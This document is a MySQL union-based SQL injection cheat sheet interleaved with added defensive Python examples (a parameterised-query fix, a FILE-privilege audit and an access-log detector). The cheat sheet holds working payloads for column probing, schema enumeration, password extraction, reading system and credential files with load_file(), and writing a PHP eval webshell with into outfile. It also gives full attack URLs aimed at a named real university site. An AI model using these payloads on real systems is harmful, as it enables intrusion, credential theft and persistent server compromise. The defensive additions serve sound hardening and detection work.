Finding the number of fields
order by <num>/*
Matching the number of fields
and 1=1 union select 1,2,3,4,5,...,N/*
Finding which fields are displayed
and 1=2 union select 1,2,3,4,5,...,N/*
Using built-in functions to obtain database information
version()  database()  user()
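The sequence above (order by to find the column count, a union select with the matching count, then a built-in function placed in a displayed column) only works because the id parameter is pasted into the SQL text. The following is an added example written for this page, not code from the original: it reproduces the column-count probing and the union read against a constructed in-memory SQLite database (the tables, rows and the admin credentials are made up) and places the parameterised lookup that closes the hole beside it. SQLite is used only because it runs without a server; an out-of-range order by and a union with mismatched column counts are errors in MySQL as well.

```python
import sqlite3


def make_db():
    """Constructed stand-in for a target schema: a public table the page reads
    from and a private table the union injection is used to reach."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)",
                     [(1, "Hello", "first post"), (2, "Second", "more text")])
    conn.execute("INSERT INTO admin VALUES (1, 'admin', 's3cret-hash')")  # constructed value
    conn.commit()
    return conn


def vulnerable_lookup(conn, user_id):
    """The pattern this page exploits: the parameter is spliced into the SQL
    text, so 'order by N' and 'union select ...' become part of the statement."""
    sql = "SELECT id, title, body FROM news WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def probe_succeeds(conn, user_id):
    """True when the vulnerable query ran without an error. A 'normal' page
    versus an error page is exactly the signal the column-count guessing uses."""
    try:
        vulnerable_lookup(conn, user_id)
        return True
    except sqlite3.Error:
        return False


def safe_lookup(conn, user_id):
    """Hardened form: validate the type, then bind the value as a parameter so
    it is sent as data and can never change the statement's structure."""
    if not user_id.isdigit():
        raise ValueError("id must be a positive integer")
    return conn.execute("SELECT id, title, body FROM news WHERE id = ?",
                        (int(user_id),)).fetchall()


def run_safely(conn, user_id):
    """Rows from safe_lookup, or None when the input was rejected."""
    try:
        return safe_lookup(conn, user_id)
    except ValueError:
        return None


if __name__ == "__main__":
    db = make_db()
    # order by 3 is fine, order by 4 errors: the table has three columns
    print(probe_succeeds(db, "1 order by 3"), probe_succeeds(db, "1 order by 4"))
    # union with three columns reads the other table through the displayed fields
    print(vulnerable_lookup(db, "1 and 1=2 union select 1, username, password from admin"))
    # the same input is simply rejected by the parameterised version
    print(run_safely(db, "1 and 1=2 union select 1, username, password from admin"))
```

The validation step alone is not the defence; a text parameter such as a name would pass a type check and still be injected if concatenated. Binding the value is what matters, and the type check only gives an earlier, clearer failure.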
Without guessing which field is displayed (does not work on every site):
and 1=2 union all select version()/*
and 1=2 union all select database()/*
and 1=2 union all select user()/*
Operating system information:
and 1=2 union all select @@global.version_compile_os from mysql.user/*
Database privileges:
and ord(mid(user(),1,1))=114/*   if the page returns normally the user is root (114 is the ASCII code of 'r')
Enumerating the database (MySQL >= 5.0)
MySQL 5 and later ship the built-in database information_schema, which stores the structure of every database and table on the server.
and 1=2 union select 1,2,3,schema_name,5,6,7,8,9,10 from information_schema.schemata limit 0,1
Guessing tables
and 1=2 union select 1,2,3,table_name,5,6,7,8,9,10 from information_schema.tables where table_schema=<database name in hex> limit 0,1
(in limit 0,1 the first number is the starting record, 0 being the first, and the second is how many records to show)
Guessing fields
and 1=2 union select 1,2,3,column_name,5,6,7,8,9,10 from information_schema.columns where table_name=<table name in hex> limit 0,1
Reading passwords
and 1=2 union select 1,2,3,<username field>,5,6,7,<password field>,8,9 from <table name> limit 0,1
Advanced usage (showing two values in a single displayed field):
union select 1,2,3,concat(<username field>,0x3c,<password field>),5,6,7,8,9 from <table name> limit 0,1
(0x3c is '<', used as the separator between the two values)
Writing a webshell directly (requires root privilege)
Conditions: 1. The physical path of the site is known
2. The account has sufficient privileges (test with select ... from mysql.user)
3. magic_quotes_gpc = off
select '<?php eval($_POST[cmd])?>' into outfile '<physical path>'
and 1=2 union all select <hex of the one-line webshell> into outfile '<path>'
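Conditions 2 and 3 are the ones the server side controls. The following is an added example, not code from the page: a small audit that reads SHOW GRANTS output together with the secure_file_priv server variable and reports whether an account could use load_file() or into outfile at all. The grant lines and account names are constructed; the privilege names and the variable are MySQL's own. The FILE privilege is global, so only grants on *.* can carry it.

```python
import re

# Constructed output of SHOW GRANTS FOR CURRENT_USER() for two accounts.
WEB_APP_GRANTS = [
    "GRANT USAGE ON *.* TO 'webapp'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `shop`.* TO 'webapp'@'localhost'",
]
ROOT_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
]

GRANT_RE = re.compile(r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\b", re.IGNORECASE)


def has_file_privilege(grant_lines):
    """True if any grant confers the global FILE privilege, the prerequisite
    for LOAD_FILE() and SELECT ... INTO OUTFILE."""
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if not m or m.group("scope") != "*.*":
            continue  # FILE is global-only; database-level grants cannot carry it
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if "ALL PRIVILEGES" in privs or "ALL" in privs or "FILE" in privs:
            return True
    return False


def file_io_exposure(grant_lines, secure_file_priv):
    """Classify what file reads and writes through SQL could reach.
    secure_file_priv is the server variable: None for NULL (file I/O disabled),
    '' for unrestricted, or a directory path the server is confined to."""
    if not has_file_privilege(grant_lines):
        return "none: account lacks the FILE privilege"
    if secure_file_priv is None:
        return "none: secure_file_priv is NULL, file I/O disabled server-wide"
    if secure_file_priv == "":
        return "high: FILE privilege and empty secure_file_priv, any path mysqld can access"
    return "limited: FILE privilege, confined to " + secure_file_priv


if __name__ == "__main__":
    for name, grants in (("webapp", WEB_APP_GRANTS), ("root", ROOT_GRANTS)):
        for setting in (None, "", "/var/lib/mysql-files"):
            print(name, repr(setting), "->", file_io_exposure(grants, setting))
```

The "high" case is the one every step in this section depends on: a web application connecting as root with an empty secure_file_priv. Running the application under an account like the constructed webapp one removes the into outfile and load_file() paths regardless of whether the injection itself is ever found. Condition 3 is moot on current PHP, since magic_quotes_gpc was removed in PHP 5.4, but that also means nothing is escaping the quotes for you.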
Common load_file() paths:
1. replace(load_file(0x2f6574632f706173737764),0x3c,0x20)
2. replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
Both forms display the complete source of a PHP file. Some characters have to be replaced before display: if '<' is returned unchanged the browser renders the output as a web page and the code cannot be read, which is why '<' is converted to a space.
3. load_file(char(47)) lists the root directory on FreeBSD and SunOS.
4. /etc/httpd/conf/httpd.conf or /usr/local/apache/conf/httpd.conf: Apache virtual host configuration on Linux.
5. c:\Program Files\apache group\apache\conf\httpd.conf or c:\apache\conf\httpd.conf: Apache configuration on Windows.
6. c:/resin-3.0.14/conf/resin.conf: Resin configuration of a JSP site.
7. c:/resin/conf/resin.conf or /usr/local/resin/conf/resin.conf
8. d:\apache\apache2\conf\httpd.conf
9. c:\Program Files\mysql\my.ini
10. ../themes/darkblue_orange/layout.inc.php: phpMyAdmin path disclosure
11. c:\windows\system32\inetsrv\metabase.xml: IIS virtual host configuration
12. /usr/local/resin-3.0.22/conf/resin.conf: Resin 3.0.22 configuration
13. /usr/local/resin-pro-3.0.22/conf/resin.conf: same as above
14. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf: Apache virtual host settings
15. /etc/sysconfig/iptables: firewall policy
16. /usr/local/app/php5/lib/php.ini: PHP settings
17. /etc/my.cnf: MySQL configuration
18. /etc/redhat-release: Red Hat system version
19. c:\mysql\data\mysql\user.MYD: MySQL user passwords
20. /etc/sysconfig/network-scripts/ifcfg-eth0: IP address
21. c:\Program Files\rhinosoft.com\Serv-U\servudaemon.ini: Serv-U configuration
22. c:\windows\my.ini
23. c:\boot.ini
Common website configuration files: config.inc.php and config.php. load_file() must be wrapped as replace(load_file(<hex>),char(60),char(32)).
Note:
char(60) is '<'
char(32) is a space
Problems with manual injection:
After the injection, the page displays:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
Example: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?id=13%20and%201=2%20union%20select%201,load_file(0x433a5c626f6f742e696e69),3,4,user()%20
This is caused by the two sides of the UNION having different character sets or collations.
Solution: wrap the parameter in unhex(hex(...)). hex() renders the value as a hex string and unhex() turns it back into a binary string, which carries no collation and so cannot conflict with the other side. The URL above becomes:
http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?id=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433a5c626f6f742e696e69))),3,4,unhex(hex(user()))%20
and the injection can continue.
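Every payload on this page, including the unhex(hex()) rewrite above, leaves a recognisable shape in the web server's access log once the query string is URL-decoded. The following is an added example written for this page, not part of the original: a small rule set run over four constructed Apache log lines, a normal request followed by the order by probe, the union/load_file() request and its unhex(hex()) variant. The client address, timestamps and path are made up; the hex argument is the one in the page's example URL. The rule names are my own labels for the techniques in the sections above.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed Apache combined-log lines. Line 1 is benign; lines 2 to 4 carry
# the payload shapes listed on this page.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /instrument.php?id=13 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /instrument.php?id=13%20order%20by%2010/* HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /instrument.php?id=13%20and%201=2%20union%20select%201,load_file(0x433a5c626f6f742e696e69),3,4,user()%20 HTTP/1.1" 200 811 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:49 +0000] "GET /instrument.php?id=13+and+1%3D2+union+select+1,unhex(hex(load_file(0x433a5c626f6f742e696e69))),3,4,unhex(hex(user())) HTTP/1.1" 200 811 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(?P<target>\S+)\s+HTTP/')

# Each rule is labelled with the technique from this page that it recognises.
RULES = [
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+")),
    ("boolean_probe", re.compile(r"\band\s+1\s*=\s*[12]\b")),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("schema_enum", re.compile(r"\binformation_schema\.")),
    ("server_fingerprint", re.compile(r"\b(?:version|database|user)\s*\(\s*\)|@@(?:global\.)?version")),
    ("file_read", re.compile(r"\bload_file\s*\(")),
    ("file_write", re.compile(r"\binto\s+(?:out|dump)file\b")),
    ("collation_bypass", re.compile(r"\bunhex\s*\(\s*hex\s*\(")),
    ("comment_terminator", re.compile(r"(?:/\*|--\s|#)\s*$")),
]


def normalise(target):
    """Decode percent-encoding and '+' in the query string (twice, to cover
    double encoding), lower-case it and collapse whitespace, so the rules see
    roughly the SQL fragment the database would have received."""
    query = urlsplit(target).query
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded).strip().lower()


def classify(line):
    """Sorted list of rule names matched by one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    text = normalise(m.group("target"))
    return sorted(name for name, rx in RULES if rx.search(text))


def scan(log_text):
    """Map each suspicious line (1-based line number) to the techniques seen."""
    findings = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        hits = classify(line)
        if hits:
            findings[n] = hits
    return findings


if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG).items():
        print(n, ", ".join(hits))
```

Decoding before matching is the step that makes the rules hold up: the same union select appears as %20, as '+' and as literal spaces in the three constructed lines, and the unhex(hex()) variant changes the collation error into a successful read without changing its log footprint. For POST bodies the request line carries nothing useful, so the same rules need to run on the application's own logging of parameters.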